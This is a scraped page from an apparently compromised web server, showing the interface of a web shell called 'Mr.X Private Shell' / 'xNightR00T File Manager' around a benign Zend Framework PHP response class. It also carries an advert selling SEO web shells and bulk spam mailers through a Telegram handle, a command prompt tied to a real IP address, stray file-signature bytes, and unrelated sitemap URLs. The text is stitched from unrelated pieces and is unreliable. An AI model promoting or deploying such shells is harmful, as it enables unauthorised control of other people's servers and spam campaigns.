xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

class ZendX_Service_ZendServer_Response
{
    /**
     * Response code
     *
     * @var string
     */
    protected $_code    = null;

    /**
     * Response HTTP message
     *
     * @var string
     */
    protected $_message = null;

    /**
     * Response headers
     *
     * @var array
     */
    protected $_headers = array();

    /**
     * SimpleXML element containing the response XML (if any)
     *
     * @var SimpleXMLElement
     */
    protected $_xml     = null;

    /**
     * Response data for non-XML responses
     *
     * @var string
     */
    protected $_data    = null;

    /**
     * Response type API version
     *
     * @var string
     */
    protected $_version = null;

    /**
     * Create a new response object
     *
     * @param Zend_Http_Response $response
     */
    public function __construct(Zend_Http_Response $response)
    {
    	$ctype = $response->getHeader('content-type');
        if (($pos = strpos($ctype, ';')) !== false) {
            if (preg_match('/;\s*version="?([\d+\.]+)"?/', $ctype, $match, 0, $pos)) {
                $this->_version = $match[1];
            }
            $ctype = substr($ctype, 0, $pos);
        }
        $ctype = trim($ctype);

        switch($ctype) {
            case ZendX_Service_ZendServer::ZSAPI_MEDIATYPE:
                $this->_loadVerifyXmlBody($response->getBody());
                break;

            case ZendX_Service_ZendServer::ZSAPI_CFGFILE_MEDIATYPE:
                $this->_data = $response->getBody();
                break;

            default:
                require_once 'ZendX/Service/ZendServer/Exception.php';
                throw new ZendX_Service_ZendServer_Exception("Unexpected response content type: $ctype");
                break;
        }

        $this->_code = $response->getStatus();

        if ($this->_code >= 200 && $this->_code < 300) {
            // Successful response
            if ($this->_xml) {
                if (! $this->_xml->responseData) {
                    require_once 'ZendX/Service/ZendServer/Exception.php';
                    throw new ZendX_Service_ZendServer_Exception("Response XML doesn't contain a responseData block");
                }
            }

        } elseif ($this->_code >= 400 && $this->_code < 600) {
            // Error response
            if (! ($this->_xml->errorData &&
                   $this->_xml->errorData->errorMessage &&
                   $this->_xml->errorData->errorCode)) {

                require_once 'ZendX/Service/ZendServer/Exception.php';
                throw new ZendX_Service_ZendServer_Exception("Error response XML doesn't contain error information");
            }

        } else {
            require_once 'ZendX/Service/ZendServer/Exception.php';
            throw new ZendX_Service_ZendServer_Exception("Unexpected response code: $this->_code");
        }

        $this->_message = $response->getMessage();
        $this->_headers = $response->getHeaders();
    }

    /**
     * Get the repsonse content type
     *
     * @return string
     */
    public function getContentType()
    {
        return $this->getHeader('content-type');
    }

    /**
     * Get the content version (API version)
     *
     * @return string
     */
    public function getContentVersion()
    {
        return $this->_version;
    }

    /**
     * Get the value of a specified header
     *
     * @param  string $header
     * @return string
     */
    public function getHeader($header)
    {
        $header = ucwords(strtolower($header));
        if (isset($this->_headers[$header])) {
            return $this->_headers[$header];
        } else {
            return null;
        }
    }

    /**
     * Is the response an error response?
     *
     * @return boolean
     */
    public function isError()
    {
        return ($this->_code >= 400);
    }

    /**
     * Get the error code for an error response
     *
     * @return string
     */
    public function getErrorCode()
    {
        if ($this->_xml && $this->_xml->errorData) {
            return (string) $this->_xml->errorData->errorCode;
        }
    }

    /**
     * Get the error message for an error response
     *
     * @return string
     */
    public function getErrorMessage()
    {
        if ($this->_xml && $this->_xml->errorData) {
            return (string) $this->_xml->errorData->errorMessage;
        } else {
            return $this->_message;
        }
    }

    /**
     * Return the HTTP status code for this response
     *
     * @return integer
     */
    public function getHttpStatusCode()
    {
        return $this->_code;
    }

    /**
     * Get the XML body of the response
     *
     * @return SimpleXMLElement
     */
    public function getXmlBody()
    {
        return $this->_xml;
    }

    /**
     * Get response data for non-XML responses
     *
     * @return string
     */
    public function getData()
    {
        return $this->_data;
    }

    /**
     * Load the XML response body into a SimpleXmlElement object and verify it
     *
     * @param  string $xml
     * @throws ZendX_Service_ZendServer_Exception
     */
    protected function _loadVerifyXmlBody($xml)
    {
        $useInternal = libxml_use_internal_errors(true);
        $xml = simplexml_load_string($xml); /* @var $xml SimpleXmlElement */
        
        if (! $xml) {
            $error = libxml_get_last_error();
            require_once 'ZendX/Service/ZendServer/Exception.php';
            throw new ZendX_Service_ZendServer_Exception("Unable to parse response XML: " . $error->message);
        }
        libxml_use_internal_errors($useInternal);
        // TODO: dynamically decide on XML namespcae to register based on content type
        // $xml->registerXPathNamespace('zs', ZendX_Service_ZendServer::ZSAPI_XMLNS);

        if ($xml->getName() != 'zendServerAPIResponse') {
            require_once 'ZendX/Service/ZendServer/Exception.php';
            throw new ZendX_Service_ZendServer_Exception("Unexpected response XML root element: {$xml->getName()}");
        }

        $this->_xml = $xml;
    }
}

Filemanager

Name Type Size Permission Actions
ApplicationInfo.php File 5.19 KB 0644
ApplicationServer.php File 2.06 KB 0644
ApplicationsList.php File 2.51 KB 0644
Exception.php File 1.56 KB 0644
LibraryInfo.php File 4.25 KB 0644
LicenseInfo.php File 2.99 KB 0644
Message.php File 1.1 KB 0644
Response.php File 5.99 KB 0644
ServerInfo.php File 3.68 KB 0644
ServersList.php File 2.02 KB 0644
SystemInfo.php File 2.96 KB 0644
bootstrapResponse.php File 2.35 KB 0644
libraryVersion.php File 2.38 KB 0644
vhostInfo.php File 2.42 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml